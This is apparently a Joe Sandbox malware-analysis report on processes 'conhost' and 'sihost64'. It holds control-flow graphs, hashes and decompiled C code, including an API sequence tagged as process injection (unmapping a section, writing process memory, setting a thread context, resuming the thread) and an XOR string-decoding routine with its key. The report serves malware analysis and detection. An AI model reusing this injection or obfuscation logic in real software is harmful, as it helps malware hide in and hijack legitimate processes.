267->277 278 224d5b4e238-224d5b4e243 call 224d5b4e2d6 267->278 268->223 272 224d5b4e217-224d5b4e222 call 224d5b4eb6a 268->272 284 224d5b4e189-224d5b4e1b2 271->284 285 224d5b4e16b-224d5b4e16e 271->285 272->223 274->251 279 224d5b4e110-224d5b4e117 274->279 277->223 278->277 279->223 279->251 284->223 291 224d5b4e1b8-224d5b4e1f8 284->291 285->259 286 224d5b4e174-224d5b4e187 call 224d5b4f3e2 285->286 292 224d5b4e1fa-224d5b4e1fb 286->292 291->223 291->292 292->259
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000015.00000002.807713092.00000224D5930000.00000040.00000001.sdmp, Offset: 00000224D5930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_21_2_224d5930000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                                                                                    • Instruction ID: bd3f0db1454792f36c5d11eaeaba9eac9e8e74b70dd106d98b29aebad4d13a80
                                                                                                                                    • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                                                                                    • Instruction Fuzzy Hash: F2C19770314D056BEB79FB68C4D97B9B3D1FB98308F544229D55AC7286DF20E8528B82
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA3626A3EE, Relevance: 1.6, APIs: 1, Instructions: 113nativeCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 410 7ffa3626a3ee-7ffa3626a4b8 NtUnmapViewOfSection 414 7ffa3626a4c0-7ffa3626a4dc 410->414 415 7ffa3626a4ba 410->415 415->414
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000015.00000002.828672819.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_21_2_7ffa36260000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: SectionUnmapView
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 498011366-0
                                                                                                                                    • Opcode ID: aaaec7b0bb3c53b9b704f8e994fed6366a9e3aa46868a04e2d8355155bbdd596
                                                                                                                                    • Instruction ID: 9246c2d8cc1db0438857886ad7dd9cfe9ce7e738e9791a3a66b0586cecbdccd5
                                                                                                                                    • Opcode Fuzzy Hash: aaaec7b0bb3c53b9b704f8e994fed6366a9e3aa46868a04e2d8355155bbdd596
                                                                                                                                    • Instruction Fuzzy Hash: AB31F43090C7888FDB49DB68CC4A7A97FF1EF67320F04429FD049C7292DAA59446CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00000224D5B4DCB2, Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000015.00000002.807713092.00000224D5930000.00000040.00000001.sdmp, Offset: 00000224D5930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_21_2_224d5930000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ArrayCreateDestroyInstanceSafe
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3902440814-0
                                                                                                                                    • Opcode ID: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                                                                                    • Instruction ID: 7dab9733bf0d00dfe1f51c20176a1338494bb6f2f3ebb0ac2e49856a310da712
                                                                                                                                    • Opcode Fuzzy Hash: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                                                                                    • Instruction Fuzzy Hash: CA815D31208B088FDB68EF28C889BA6B7E1FFA9305F004A6DD59BC7155EE31E5458B41
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA36269FB0, Relevance: 1.9, APIs: 1, Instructions: 388processCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 151 7ffa36269fb0-7ffa36269fb7 152 7ffa36269fb9-7ffa36269fc1 151->152 153 7ffa36269fc2-7ffa3626a080 151->153 152->153 156 7ffa3626a0de-7ffa3626a110 153->156 157 7ffa3626a082-7ffa3626a091 153->157 164 7ffa3626a16e-7ffa3626a1c6 156->164 165 7ffa3626a112-7ffa3626a121 156->165 157->156 158 7ffa3626a093-7ffa3626a096 157->158 159 7ffa3626a0d0-7ffa3626a0d8 158->159 160 7ffa3626a098-7ffa3626a0ab 158->160 159->156 162 7ffa3626a0af-7ffa3626a0c2 160->162 163 7ffa3626a0ad 160->163 162->162 167 7ffa3626a0c4-7ffa3626a0cc 162->167 163->162 173 7ffa3626a1c8-7ffa3626a1d7 164->173 174 7ffa3626a224-7ffa3626a24e 164->174 165->164 166 7ffa3626a123-7ffa3626a126 165->166 168 7ffa3626a160-7ffa3626a168 166->168 169 7ffa3626a128-7ffa3626a13b 166->169 167->159 168->164 171 7ffa3626a13f-7ffa3626a152 169->171 172 7ffa3626a13d 169->172 171->171 175 7ffa3626a154-7ffa3626a15c 171->175 172->171 173->174 176 7ffa3626a1d9-7ffa3626a1dc 173->176 180 7ffa3626a250-7ffa3626a258 174->180 181 7ffa3626a25c-7ffa3626a26b 174->181 175->168 178 7ffa3626a1de-7ffa3626a1f1 176->178 179 7ffa3626a216-7ffa3626a21e 176->179 182 7ffa3626a1f5-7ffa3626a208 178->182 183 7ffa3626a1f3 178->183 179->174 180->181 184 7ffa3626a26d-7ffa3626a275 181->184 185 7ffa3626a278-7ffa3626a2ff CreateProcessA 181->185 182->182 186 7ffa3626a20a-7ffa3626a212 182->186 183->182 184->185 187 7ffa3626a301 185->187 188 7ffa3626a307-7ffa3626a344 call 7ffa3626a360 185->188 186->179 187->188 191 7ffa3626a34b-7ffa3626a35f 188->191 192 7ffa3626a346 188->192 192->191
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000015.00000002.828672819.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_21_2_7ffa36260000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: fe2daeb506b15a32e1e4d18105b458c425501154a6f7249c3a54d95761d16aea
                                                                                                                                    • Instruction ID: 9bda36c002641ceb7f23bc63ce503f83e08d4327ab1b71f66f8b0fc9d585c4ba
                                                                                                                                    • Opcode Fuzzy Hash: fe2daeb506b15a32e1e4d18105b458c425501154a6f7249c3a54d95761d16aea
                                                                                                                                    • Instruction Fuzzy Hash: F7C1B830918A4D8FEBA4DF58CC46BE977D0FB59310F11822EE84DC7291DFB5A5458B82
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA3626A5E0, Relevance: 1.6, APIs: 1, Instructions: 128injectionCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 294 7ffa3626a5e0-7ffa3626a5e7 295 7ffa3626a5e9-7ffa3626a5f1 294->295 296 7ffa3626a5f2-7ffa3626a668 294->296 295->296 300 7ffa3626a66a-7ffa3626a66f 296->300 301 7ffa3626a672-7ffa3626a6b5 WriteProcessMemory 296->301 300->301 302 7ffa3626a6bd-7ffa3626a6da 301->302 303 7ffa3626a6b7 301->303 303->302
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000015.00000002.828672819.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_21_2_7ffa36260000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                    • Opcode ID: 606375edb05cdba4203d509a66fea78ab93b8995777aa6c5c28bc47f0721c41f
                                                                                                                                    • Instruction ID: 28197c5832752c36f1333d87a516c291ad85048024ab804fcd0256aacf980648
                                                                                                                                    • Opcode Fuzzy Hash: 606375edb05cdba4203d509a66fea78ab93b8995777aa6c5c28bc47f0721c41f
                                                                                                                                    • Instruction Fuzzy Hash: C631D371D1CA4C9FDB58EB5C9846AF9BBE0FB5A321F04426FD049D3252DB70A8068B91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00000224D5B4D1BA, Relevance: 1.6, APIs: 1, Instructions: 125libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 304 224d5b4d1ba-224d5b4d1dd LoadLibraryA 305 224d5b4d1e9-224d5b4d1fc 304->305 306 224d5b4d1df-224d5b4d1e4 304->306 309 224d5b4d202-224d5b4d213 305->309 310 224d5b4d2be 305->310 307 224d5b4d2c0-224d5b4d2d0 306->307 309->310 311 224d5b4d219-224d5b4d231 309->311 310->307 311->310 313 224d5b4d237-224d5b4d26b call 224d5b4f65e 311->313 313->310 318 224d5b4d26d-224d5b4d27e 313->318 318->310 319 224d5b4d280-224d5b4d297 318->319 319->310 321 224d5b4d299-224d5b4d2b9 call 224d5b4f65e 319->321 321->306
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000015.00000002.807713092.00000224D5930000.00000040.00000001.sdmp, Offset: 00000224D5930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_21_2_224d5930000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                                                                                    • Instruction ID: db6509fc3389dc421842c226ceba6cc2d87f19c8d51aab7c40071a2a79dcd1e4
                                                                                                                                    • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                                                                                    • Instruction Fuzzy Hash: FF31813130CA085FEB58BF68E8492AA77D6EB98310F101559ED4BC728ADEA4DD0687C1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00000224D5B4D0AF, Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 389 224d5b4d0af-224d5b4d0c5 LoadLibraryA 390 224d5b4d0c7-224d5b4d0cc 389->390 391 224d5b4d0d1-224d5b4d0e4 389->391 392 224d5b4d1a8-224d5b4d1b8 390->392 394 224d5b4d0ea-224d5b4d0fb 391->394 395 224d5b4d1a6 391->395 394->395 396 224d5b4d101-224d5b4d119 394->396 395->392 396->395 398 224d5b4d11f-224d5b4d153 call 224d5b4f65e 396->398 398->395 403 224d5b4d155-224d5b4d166 398->403 403->395 404 224d5b4d168-224d5b4d17f 403->404 404->395 406 224d5b4d181-224d5b4d1a1 call 224d5b4f65e 404->406 406->390
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000015.00000002.807713092.00000224D5930000.00000040.00000001.sdmp, Offset: 00000224D5930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_21_2_224d5930000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                                                                                    • Instruction ID: 2d4301ab1c20d99950c2b11f10f7dda4c3e81a0c01f7e1f6dd572efc95ffdd2f
                                                                                                                                    • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                                                                                    • Instruction Fuzzy Hash: DF31737130CE084FEB68BB98985976973D6EBD8320F100259DD4BC72C9DE60DD4687C1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA3626A6E0, Relevance: 1.6, APIs: 1, Instructions: 106threadinjectionCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 416 7ffa3626a6e0-7ffa3626a6e7 417 7ffa3626a6e9-7ffa3626a6f1 416->417 418 7ffa3626a6f2-7ffa3626a788 SetThreadContext 416->418 417->418 422 7ffa3626a790-7ffa3626a7b7 418->422 423 7ffa3626a78a 418->423 423->422
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000015.00000002.828672819.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_21_2_7ffa36260000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1591575202-0
                                                                                                                                    • Opcode ID: 1dd19c1ad9574d99be6b6eb1091f6ac82ae815898a79fe5944482c054acf7102
                                                                                                                                    • Instruction ID: cba0530f32056317d3a12f411f06a318accce9b802cd9044663748edfe584e31
                                                                                                                                    • Opcode Fuzzy Hash: 1dd19c1ad9574d99be6b6eb1091f6ac82ae815898a79fe5944482c054acf7102
                                                                                                                                    • Instruction Fuzzy Hash: F631D631A0C6488FEB58DF9C984A7F97BE1EB66321F04416FD04DC3252DA75A846CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA3626A7BC, Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 424 7ffa3626a7bc-7ffa3626a7c3 425 7ffa3626a7ce-7ffa3626a862 ResumeThread 424->425 426 7ffa3626a7c5-7ffa3626a7cd 424->426 430 7ffa3626a86a-7ffa3626a886 425->430 431 7ffa3626a864 425->431 426->425 431->430
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000015.00000002.828672819.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_21_2_7ffa36260000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                    • Opcode ID: 91601e886260505fd6427447829910dc7f2180a3d4f31cdab29532f34f52d6c7
                                                                                                                                    • Instruction ID: 8165f89fe9dc48f052a6a28621e00605998bb873977de650fc5590cc8721ba0e
                                                                                                                                    • Opcode Fuzzy Hash: 91601e886260505fd6427447829910dc7f2180a3d4f31cdab29532f34f52d6c7
                                                                                                                                    • Instruction Fuzzy Hash: 5531D63190CA4C9FEB59DB98884ABE9BBF0FB56320F00416FD04DC3292DB656816CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00000224D5B4D0A2, Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 432 224d5b4d0a2-224d5b4d0c5 LoadLibraryA 434 224d5b4d0c7-224d5b4d0cc 432->434 435 224d5b4d0d1-224d5b4d0e4 432->435 436 224d5b4d1a8-224d5b4d1b8 434->436 438 224d5b4d0ea-224d5b4d0fb 435->438 439 224d5b4d1a6 435->439 438->439 440 224d5b4d101-224d5b4d119 438->440 439->436 440->439 442 224d5b4d11f-224d5b4d153 call 224d5b4f65e 440->442 442->439 447 224d5b4d155-224d5b4d166 442->447 447->439 448 224d5b4d168-224d5b4d17f 447->448 448->439 450 224d5b4d181-224d5b4d1a1 call 224d5b4f65e 448->450 450->434
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000015.00000002.807713092.00000224D5930000.00000040.00000001.sdmp, Offset: 00000224D5930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_21_2_224d5930000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                                                                                    • Instruction ID: 1bb775df47e5c63102afb06c0bdaeb9d785401b32571ffca22050bbc9b270f33
                                                                                                                                    • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                                                                                    • Instruction Fuzzy Hash: 68E0203120CA0D1FF768B7DDD84E7B666D8D795375F00003FFA49C2202E445D8920391
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Analysis Process: sihost64.exe PID: 6288 Parent PID: 6012 sihost64.exeCOMMON

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:28%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:15
                                                                                                                                    Total number of Limit Nodes:0

                                                                                                                                    Graph

                                                                                                                                    execution_graph 303 4023f2 _controlfp 304 4010c4 2 API calls 303->304 305 402473 304->305 289 4022fa 290 40232c 289->290 293 40224f 290->293 292 4023e5 294 402285 293->294 297 4010c4 294->297 296 4022be 296->292 298 402480 297->298 299 4010e7 memset 298->299 300 40115b 299->300 301 401214 sprintf 300->301 302 4012bd 301->302 302->296

                                                                                                                                    Callgraph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    • Opacity -> Relevance
                                                                                                                                    • Disassembly available
                                                                                                                                    callgraph 0 Function_004098C0 1 Function_00401443 2 Function_004010C4 12 Function_00401D58 2->12 19 Function_004019D8 2->19 47 Function_00401000 2->47 67 Function_00401D98 2->67 72 Function_00401C98 2->72 73 Function_00401D18 2->73 3 Function_004098C5 4 Function_004017C6 5 Function_004024C7 6 Function_00409649 7 Function_004022CB 8 Function_00409D4C 9 Function_0040224F 9->2 11 Function_00402158 9->11 36 Function_004021EC 9->36 10 Function_004098D4 38 Function_004018EF 12->38 13 Function_00401CD8 13->38 14 Function_00401C58 14->38 15 Function_00401BD8 15->38 16 Function_00401AD8 16->38 17 Function_00401B58 17->38 18 Function_00401A58 18->38 19->38 20 Function_00409D58 21 Function_00409AD8 22 Function_00409358 23 Function_004020D8 23->38 24 Function_00401F58 24->38 25 Function_00401FD8 25->38 26 Function_00402058 26->38 27 Function_00401E58 27->38 28 Function_00401ED8 28->38 29 Function_00401DD8 29->38 30 Function_00409459 31 Function_004098DC 32 Function_00409A61 33 Function_004021E5 34 Function_00409AE6 35 Function_00409667 37 Function_00409BEC 77 Function_004014B4 38->77 39 Function_00409AEF 40 Function_00401970 41 Function_004023F2 41->2 42 Function_00409AF3 43 Function_00402477 44 Function_004022FA 44->9 45 Function_004098FB 46 Function_00409BFF 48 Function_00409B00 49 Function_00409B03 50 Function_00409C03 51 Function_00401784 52 Function_00402487 53 Function_00409A8D 54 Function_0040948F 55 Function_00409291 56 Function_00402497 57 Function_00401C18 57->38 58 Function_00401B18 58->38 59 Function_00401E18 59->38 60 Function_00402018 60->38 61 Function_00401F18 61->38 62 Function_00401F98 62->38 63 Function_00401E98 63->38 64 Function_00402098 64->38 65 Function_00402118 65->38 66 Function_00409C98 67->38 68 Function_00401A18 68->38 69 Function_00401A98 69->38 70 Function_00401998 70->38 71 Function_00401B98 71->38 72->38 73->38 74 Function_00409923 75 Function_004024A7 76 Function_004098AC 77->1 77->40 78 Function_00409E36 79 Function_004090B6 80 Function_004024B7 81 Function_00409AB7 82 Function_004092BC 83 Function_004010BD

                                                                                                                                    Executed Functions

                                                                                                                                    Function 004010C4, Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    C-Code - Quality: 33%
                                                                                                                                    			E004010C4(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
				intOrPtr _v24;
				char _v32;
				char _v136;
				void* _v144;
				char _v152;
				char _v160;
				char _v168;
				char _v176;
				char _v696;
				void* _v1216;
				long long _v1224;
				long long _v1232;
				long long _v1256;
				long long _v1264;
				long long _v1272;
				long long _v1280;
				long long _v1288;
				long long _v1296;
				long long _v1304;
				long long _t104;

				_a8 = __rcx;
				_a16 = __rdx;
				L00402480(); // executed
				memset(??, ??, ??);
				_v136 = 0x68;
				_v144 = 0;
				_v152 = 0x5ad4;
				_v160 = 0;
				L00402490();
				E00401000(0x403021,  &_v176);
				_v1224 = 0x403021;
				E00401000(0x403027, 0x403021);
				L00402498();
				_v1232 = 0x403021;
				E00401000(0x403032, 0x403021);
				L004024A0();
				E00401000(0x403047,  &_v696);
				sprintf(??, ??);
				_v1264 =  &_v32;
				_v1272 =  &_v136;
				_v1280 = 0;
				_v1288 = 0;
				_v1296 = 0;
				_v1304 = 0;
				_t104 =  &_v696;
				L004024A8(); // executed
				_v1296 = _t104;
				_v1304 = _t104;
				E00401D58(_v32,  &_v144,  &_v152,  &_v152); // executed
				E00401000(0x40305b, _v32); // executed
				_v1304 =  &_v160;
				E00401D18(_v32, _v144, 0x40305b, _v152); // executed
				_v1304 = 0;
				E00401D98(_v32,  &_v144,  &_v160, 0); // executed
				_v1256 = 0;
				_v1264 = 0;
				_v1272 = 0;
				_v1280 = 0;
				_v1288 = 0;
				_v1296 = _v144;
				_v1304 = _v144;
				E004019D8( &_v168, 0, 0, _v32); // executed
				E00401C98(_v32, 0, 0, _v32); // executed
				E00401C98(_v24, 0, 0, _v32);
				return 0;
			}























                                                                                                                                    0x004010cf
                                                                                                                                    0x004010d3
                                                                                                                                    0x004010e2
                                                                                                                                    0x00401109
                                                                                                                                    0x00401113
                                                                                                                                    0x00401120
                                                                                                                                    0x00401131
                                                                                                                                    0x00401142
                                                                                                                                    0x00401156
                                                                                                                                    0x00401173
                                                                                                                                    0x0040118a
                                                                                                                                    0x00401197
                                                                                                                                    0x004011a2
                                                                                                                                    0x004011b9
                                                                                                                                    0x004011c6
                                                                                                                                    0x004011f2
                                                                                                                                    0x0040120f
                                                                                                                                    0x0040123b
                                                                                                                                    0x00401244
                                                                                                                                    0x0040124d
                                                                                                                                    0x0040125c
                                                                                                                                    0x0040126b
                                                                                                                                    0x00401275
                                                                                                                                    0x0040127f
                                                                                                                                    0x004012a8
                                                                                                                                    0x004012b8
                                                                                                                                    0x004012c2
                                                                                                                                    0x004012cc
                                                                                                                                    0x004012fa
                                                                                                                                    0x00401318
                                                                                                                                    0x00401324
                                                                                                                                    0x0040134d
                                                                                                                                    0x0040135c
                                                                                                                                    0x0040138a
                                                                                                                                    0x00401399
                                                                                                                                    0x004013a8
                                                                                                                                    0x004013b7
                                                                                                                                    0x004013c6
                                                                                                                                    0x004013d0
                                                                                                                                    0x004013dc
                                                                                                                                    0x004013e8
                                                                                                                                    0x00401419
                                                                                                                                    0x00401428
                                                                                                                                    0x00401437
                                                                                                                                    0x00401442

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000016.00000002.771659577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000016.00000002.771633101.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000016.00000002.771697167.0000000000403000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000016.00000002.771734104.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_22_2_400000_sihost64.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: memsetsprintf
                                                                                                                                    • String ID: /sihost64
                                                                                                                                    • API String ID: 4041149307-4205773068
                                                                                                                                    • Opcode ID: 66967add2776ee5d61a5a0a0c7baf570a5a5c034d44e1e8a873f230bf59ef194
                                                                                                                                    • Instruction ID: 75c58d38917e2f42fb987e57870b6ace5dff5fe4ae0f754a9c7d23ac7967e41c
                                                                                                                                    • Opcode Fuzzy Hash: 66967add2776ee5d61a5a0a0c7baf570a5a5c034d44e1e8a873f230bf59ef194
                                                                                                                                    • Instruction Fuzzy Hash: 37712961702B148DEB909B27DC5139A37A8B749BC8F804176EE4CA7B98EE3CCA448744
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401000, Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 33 401000-401045 call 402478 36 401048-401050 33->36 37 4010b6-4010bb 36->37 38 401056-4010b4 36->38 38->36
                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E00401000(long long __rcx, long long __rdx, long long _a8, long long _a16) {
				long long _v16;
				signed int _v20;
				void* _v32;
				signed char* _v40;
				signed int _t30;

				_a8 = __rcx;
				_a16 = __rdx;
				L00402478(); // executed
				_v16 = _a16 + 1;
				 *((char*)(_v16 + _a16)) = 0;
				_v20 = 0;
				while(1) {
					_t30 = _v20;
					if(_t30 >= _a16) {
						break;
					}
					_v32 = _v16 + _v20;
					_v40 = _a8 + _v20;
					asm("cdq");
					 *_v32 =  *_v40 ^  *("ybpk_bby&rigu>]n*t1@h9_q:=q^=+nc" + _v20 % 0x20);
					_v20 = _v20 + 1;
				}
				return _t30;
			}








                                                                                                                                    0x0040100b
                                                                                                                                    0x0040100f
                                                                                                                                    0x00401023
                                                                                                                                    0x00401028
                                                                                                                                    0x0040103e
                                                                                                                                    0x00401045
                                                                                                                                    0x00401048
                                                                                                                                    0x00401048
                                                                                                                                    0x00401050
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00401085
                                                                                                                                    0x0040108e
                                                                                                                                    0x00401092
                                                                                                                                    0x004010b2
                                                                                                                                    0x00401063
                                                                                                                                    0x00401063
                                                                                                                                    0x004010bb

                                                                                                                                    Strings
                                                                                                                                    • ybpk_bby&rigu>]n*t1@h9_q:=q^=+nc, xrefs: 00401098
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000016.00000002.771659577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000016.00000002.771633101.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000016.00000002.771697167.0000000000403000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000016.00000002.771734104.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_22_2_400000_sihost64.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ybpk_bby&rigu>]n*t1@h9_q:=q^=+nc
                                                                                                                                    • API String ID: 0-2964919659
                                                                                                                                    • Opcode ID: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                                                                                                    • Instruction ID: 0d50406a0cd25772023a57935085f3dfc6f67c384a3cfb9a17e074b16623a215
                                                                                                                                    • Opcode Fuzzy Hash: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                                                                                                    • Instruction Fuzzy Hash: BC214772B01A40DEEB04CBA9D8913AC3BF1E74878DF00846AEE5DA7B58DA38D5518744
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004022FA, Relevance: .1, Instructions: 61COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                    			_entry_() {
				char _v12;
				long long _v24;
				long long _v40;
				void* _t15;
				void* _t16;

